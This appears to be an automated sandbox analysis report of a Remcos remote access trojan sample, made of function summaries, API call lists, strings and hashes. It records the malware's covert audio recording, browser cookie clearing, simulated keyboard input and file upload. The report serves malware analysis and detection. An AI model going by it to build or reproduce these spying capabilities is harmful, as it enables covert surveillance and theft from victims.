                                          • _free.LIBCMT ref: 00445515
                                          • _free.LIBCMT ref: 0044552E
                                          • _free.LIBCMT ref: 00445560
                                          • _free.LIBCMT ref: 00445569
                                          • _free.LIBCMT ref: 00445575
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorLast$_abort_memcmp
                                          • String ID: C
                                          • API String ID: 1679612858-1037565863
                                          • Opcode ID: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                          • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                          • Opcode Fuzzy Hash: 270cf3bb6288f401d2b81aec4bec5e705b2579f2f1b63f3c4bd6d63e951100ee
                                          • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: tcp$udp
                                          • API String ID: 0-3725065008
                                          • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                          • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                          • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                          • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EF0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474F08,00404C49,00000000,00000000,00000000,?,00474F08,?), ref: 00404BA5
                                            • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                          • String ID: .part
                                          • API String ID: 1303771098-3499674018
                                          • Opcode ID: 2150a189df16d023aaea6f06597ff48a5e6b6566d5180279f80c020d780b3e8b
                                          • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                          • Opcode Fuzzy Hash: 2150a189df16d023aaea6f06597ff48a5e6b6566d5180279f80c020d780b3e8b
                                          • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                          APIs
                                          • _strftime.LIBCMT ref: 00401BD4
                                            • Part of subcall function 00401CE9: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401C86
                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CC4
                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CD3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                          • String ID: %Y-%m-%d %H.%M$.wav$tMG
                                          • API String ID: 3809562944-3627046146
                                          • Opcode ID: 774d76beef9008db32f03f03aba53f46b293a4d454c50c356403b75a824fba62
                                          • Instruction ID: 77224d9c3c18060e3821781750c24aeed92f5db76bec914a8a88ddbccf287b9a
                                          • Opcode Fuzzy Hash: 774d76beef9008db32f03f03aba53f46b293a4d454c50c356403b75a824fba62
                                          • Instruction Fuzzy Hash: 5F3181315043019FC325EB62DD46A9A77A8FB84319F40443EF149A31F2EFB89949CB9A
                                          APIs
                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                          • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders$hd
                                          • API String ID: 1133728706-2233801362
                                          • Opcode ID: c205dfe74dbda60eacb93fa3a46cd8cf8d8bdcdf87e24bc8b84adc5102ad8f0a
                                          • Instruction ID: 7718d61ab729039ae94473664947c91a52367f601ff6055b29c84dcba8ed2574
                                          • Opcode Fuzzy Hash: c205dfe74dbda60eacb93fa3a46cd8cf8d8bdcdf87e24bc8b84adc5102ad8f0a
                                          • Instruction Fuzzy Hash: E7215230A40219A6CB14F7F1CC969EE7729AF50744F80017FE502B71D1EB7D6945C6DA
                                          APIs
                                          • AllocConsole.KERNEL32(00475348), ref: 0041CE35
                                          • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                          • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Console$Window$AllocOutputShow
                                          • String ID: Remcos v$5.2.0 Pro$CONOUT$
                                          • API String ID: 4067487056-793934204
                                          • Opcode ID: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                          • Instruction ID: a031bdd2f27af694b11ce09d1e3c688e218bb3586dee27dfc95755d0e541b829
                                          • Opcode Fuzzy Hash: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                          • Instruction Fuzzy Hash: 2D014471A80304BBD610F7F19D8BF9EB7AC9B18B05F500527BA04A70D2EB6DD944466E
                                          Strings
                                          • C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe, xrefs: 004076FF
                                          • xdF, xrefs: 004076E4
                                          • RG, xrefs: 004076DF
                                          • Rmc-8AGIM5, xrefs: 00407715
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Users\user\Desktop\1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453da749198.dat-decoded.exe$Rmc-8AGIM5$xdF$RG
                                          • API String ID: 0-2921564295
                                          • Opcode ID: bfa82963eea25e7f3a1000047237d0892740d3b416b353ce1bd886ed4ccf4a83
                                          • Instruction ID: 8e81a4762a03630119b5543cf4782e43f3d691fcab72f30749e56a9243805afb
                                          • Opcode Fuzzy Hash: bfa82963eea25e7f3a1000047237d0892740d3b416b353ce1bd886ed4ccf4a83
                                          • Instruction Fuzzy Hash: 08F0F6B0A14141ABCB1067355D286AA3756A784397F00487BF547FB2F2EBBD5C82861E
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                          • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                          • __alloca_probe_16.LIBCMT ref: 0044AE40
                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                          • __freea.LIBCMT ref: 0044AEB0
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • __freea.LIBCMT ref: 0044AEB9
                                          • __freea.LIBCMT ref: 0044AEDE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                          • String ID:
                                          • API String ID: 3864826663-0
                                          • Opcode ID: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                          • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                          • Opcode Fuzzy Hash: b8cd4310d0de59be5354cf63c717d249675af8b9c8b383ed5ef79fab109b86d3
                                          • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                          APIs
                                          • SendInput.USER32 ref: 00419A25
                                          • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                          • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                            • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InputSend$Virtual
                                          • String ID:
                                          • API String ID: 1167301434-0
                                          • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                          • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                          • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                          • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: __freea$__alloca_probe_16_free
                                          • String ID: a/p$am/pm$h{D
                                          • API String ID: 2936374016-2303565833
                                          • Opcode ID: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                          • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                          • Opcode Fuzzy Hash: 3f6e07506486b6d7dbef2a606a64f0e75de21b8703f606ba4f5b284e1050ed44
                                          • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                          APIs
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • _free.LIBCMT ref: 00444E87
                                          • _free.LIBCMT ref: 00444E9E
                                          • _free.LIBCMT ref: 00444EBD
                                          • _free.LIBCMT ref: 00444ED8
                                          • _free.LIBCMT ref: 00444EEF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$AllocateHeap
                                          • String ID: KED
                                          • API String ID: 3033488037-2133951994
                                          • Opcode ID: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                          • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                          • Opcode Fuzzy Hash: dfa49ca82d32c8382211b9fb73ae343eb5cb7a7eabed5eea37687c7cf3770045
                                          • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                          APIs
                                          • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                          • __fassign.LIBCMT ref: 0044B4F9
                                          • __fassign.LIBCMT ref: 0044B514
                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                          • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                          • String ID:
                                          • API String ID: 1324828854-0
                                          • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                          • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                          • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                          • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                          APIs
                                          • __Init_thread_footer.LIBCMT ref: 004018BE
                                          • ExitThread.KERNEL32 ref: 004018F6
                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EF0,00000000), ref: 00401A04
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                          • String ID: `kG$hMG$kG
                                          • API String ID: 1649129571-3851552405
                                          • Opcode ID: 7e438f7e0de7e1a48061060bf47163465fed72e99f71de3365297fa9ff44aa49
                                          • Instruction ID: dc699b77c08b599092ddf19de7d80486fcd8c0a7edd7622242773fc29a9484b7
                                          • Opcode Fuzzy Hash: 7e438f7e0de7e1a48061060bf47163465fed72e99f71de3365297fa9ff44aa49
                                          • Instruction Fuzzy Hash: 3441C2312042009BC324FB36DD96ABE73A6AB85354F00453FF54AA61F1DF38AD4AC61E
                                          APIs
                                            • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750F4), ref: 00413678
                                            • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                            • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                          • _wcslen.LIBCMT ref: 0041B7F4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                          • String ID: .exe$HSG$http\shell\open\command$program files (x86)\$program files\
                                          • API String ID: 3286818993-930133217
                                          • Opcode ID: b86b44ed08d52466cfc9a3801a6d71745e254f0deb3e8f8ed9e40c284f2e6556
                                          • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                          • Opcode Fuzzy Hash: b86b44ed08d52466cfc9a3801a6d71745e254f0deb3e8f8ed9e40c284f2e6556
                                          • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                          • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                          • Opcode Fuzzy Hash: 3e1437a1f94eb298758500833f4fd37ec9f384a351c1712870bfe34c5990e753
                                          • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                          APIs
                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401A7D
                                          • waveInOpen.WINMM(00472AC0,000000FF,00472AC8,Function_00001B8F,00000000,00000000,00000024), ref: 00401B13
                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401B67
                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401B76
                                          • waveInStart.WINMM ref: 00401B82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
